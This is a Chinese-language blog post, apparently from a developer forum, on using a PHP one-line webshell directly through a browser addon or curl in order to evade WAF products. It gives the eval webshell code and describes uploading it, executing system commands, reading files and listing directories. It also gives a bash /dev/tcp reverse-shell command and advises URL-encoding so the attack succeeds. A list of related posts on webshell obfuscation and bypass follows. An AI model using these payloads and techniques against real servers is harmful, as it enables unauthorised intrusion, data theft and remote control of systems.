PHP一句话木马使用技巧
近来发现好多网站有安全狗,会拦截菜刀和蚁剑,因此总结下通过浏览器直接调用一句话木马的姿势。
PHP一句话:<?php @eval($_POST['shy']);?>
firefox浏览器:hackbar
命令提示符:curl
首先上传一句话木马到网站目录,可以是虚拟机也可以是VPS,我这里用的是阿里云我自己搭建的网站,
由于只是简单的一句话木马,因次一上车就收到了安全云的短信安全提示,正好可以用来测试免杀一句话,免得以后测试刚上传就被发现了。
利用hackbar链接木马
利用system();执行系统命令
利用file_get_contents进行文件读取,然后用echo,或print打印出这个字符串。file_get_contents是将文件内容读入到一个字符串当中。
file_get_contents还可以替换成其他的函数
反弹shell,最重要的是记得进行url编码,不然会失败的
反射shell的语句有很多,这里是用的是最简单的bash -i >& /dev/tcp/ip/post 0>&1
利用curl链接一句话木马
基本上跟上面一样,curl参数-X post 指定http方法为post --data 后面跟post的内容
scandir() 函数返回指定目录中的文件和目录的数组
反弹shell,也要经过编码才能反弹成功
总之,编码真的很重要。
PHP一句话木马使用技巧相关推荐
- php一句话木马变形技巧
一.什么是一句话木马? 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能.为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令. ...
- php限制一个函数在几分钟内不被调用_在PHP一句话木马使用过程中的种种坑点分析...
前言 在平时的学习和练习过程中,经常会遇到上传的一句话木马无法执行我们的命令或者说能执行命令但是不能连接菜刀蚁剑等webshell管理工具,以及各个版本PHP所限制的一些一句话木马的写法,不同版本we ...
- 一句话木马拿Shell与菜刀原理
一.拿Shell的技巧 1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1 ...
- web渗透_一句话木马(webshell)_dvwa环境
厄薇娅·瑞尔说,今天是个好日子. 一.什么是一句话木马 <?php @eval($_POST['a']); ?> 先来一段简单的一句话木马,解析下它的构造: @这个符号的作用是抵制错误提示 ...
- PHP之一句话木马免杀
目录 免杀小技巧 1.字符串拼接方式,构造敏感函数. 2.通过PHP的动态函数方法执行一句话. 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接 ...
- 如何让一句话木马绕过waf的检测 ?
一.什么是一句话木马? 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能.为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令. ...
- PHP一句话木马之小马
什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能.为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令. 我们如 ...
- webshell之一句话木马变形
什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能.为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令. 我们如 ...
- PHP一句话木马解析
目录 什么是一句话木马? 执行过程 其他函数构造一句话木马 assert函数 create_function函数 call_user_func回调函数 preg_replace函数 file_put_ ...
最新文章
- 安全的 ActiveMQ
- 第四节:IO、序列化和反序列化、加密解密技术
- ue如何使用php文件,UltraEdit使用设置
- python2.7 + numpy-1.6.1 + matplotlib-1.1.0
- RxSwift之深入解析URLSession的数据请求和数据处理
- 利用python实现ORM
- 【原创】MapReduce编程系列之表连接
- 美团点评移动端基础日志库——Logan
- 99年毕业设计获优的程序-图书管理程序 续
- LINUX 下mysql主从安装与同步
- 從零開始學 ReactJS:最完整的 React 生態系入門教程
- Android setBackgroundDrawable()过时解决办法
- 实现模拟内存动态分区分配算法_你还在为了JVM而烦恼么?(内存结构和垃圾回收算法)...
- nagios监控3306端口
- C/C++回调方式系列之一 函数指针和函数回调模式
- jq ajax ajaxsubmit,如何理解jQuery中的ajaxSubmit方法
- Mac壁纸软件 - 动态 高清 炫酷 4K 精美壁纸下载
- STM32控制SG90舵机
- 83行代码通关攻略|据说看的人都过了
- InnoDB中的数据库索引